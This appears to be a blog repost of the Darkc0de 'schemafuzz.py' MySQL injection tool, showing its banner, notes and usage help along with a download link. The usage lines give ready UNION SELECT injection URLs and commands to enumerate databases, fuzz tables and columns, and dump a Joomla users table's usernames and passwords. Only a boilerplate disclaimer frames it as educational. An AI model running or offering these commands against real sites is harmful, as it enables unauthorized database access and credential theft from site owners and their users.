#!/usr/bin/python
################################################################
# .___ __ _______ .___
# __| _/____ _______| | __ ____ \ _ \ __| _/____
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\
# \/ \/ \/
# ___________ ______ _ __
# _/ ___\_ __ \_/ __ \ \/ \/ /
# \ \___| | \/\ ___/\ /
# \___ >__| \___ >\/\_/
# est.2007 \/ \/ forum.darkc0de.com
################################################################
# MySQL Injection Schema, Dataext, and fuzzer
# Share the c0de!
# Darkc0de Team
# www.darkc0de.com
# rsauron[at]gmail[dot]com
# Greetz to
# d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx,
# and the darkc0de crew
# NOTES:
# Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
# The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy
# will not be used. This is a effort to keep the script from getting stuck in a endless loop.
# Any other questions Hit the forums and ask questions. google is your friend!
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!
# BE WARNED, THIS TOOL IS VERY LOUD..
#Set default evasion options here
print " Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com"
print "\tModes:"
print "\tDefine: --dbs Shows all databases user has access too. MySQL v5+"
print "\tDefine: --schema Enumerate Information_schema Database. MySQL v5+"
print "\tDefine: --full Enumerates all databases information_schema table MySQL v5+"
print "\tDefine: --dump Extract information from a Database, Table and Column. MySQL v4+"
print "\tDefine: --fuzz Fuzz Tables and Columns. MySQL v4+"
print "\tDefine: --findcol Finds Columns length of a SQLi MySQL v4+"
print "\tDefine: --info Gets MySQL server configuration only. MySQL v4+"
print "\n\tRequired:"
print "\tDefine: -u URL \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
print "\n\tMode dump and schema options:"
print "\tDefine: -D \"database_name\""
print "\tDefine: -T \"table_name\""
print "\tDefine: -C \"column_name,column_name...\""
print "\n\tOptional:"
print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
print "\tDefine: -o \"ouput_file_name.txt\" Default is schemafuzzlog.txt"
print "\tDefine: -r row number to start at"
print "\tDefine: -v Verbosity off option. Will not display row #'s in dump mode."
print "\n Ex: ./schemafuzz.py --info -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
print " Ex: ./schemafuzz.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
print " Ex: ./schemafuzz.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D catalog -T orders -r 200"
print " Ex: ./schemafuzz.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D joomla -T jos_users -C username,password"
print " Ex: ./schemafuzz.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -end \"/*\" -o sitelog.txt"
print " Ex: ./schemafuzz.py --findcol -u \"www.site.com/news.php?id=22\""
Download di sini
Minggu, 23 Januari 2011
Schemafuzz
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar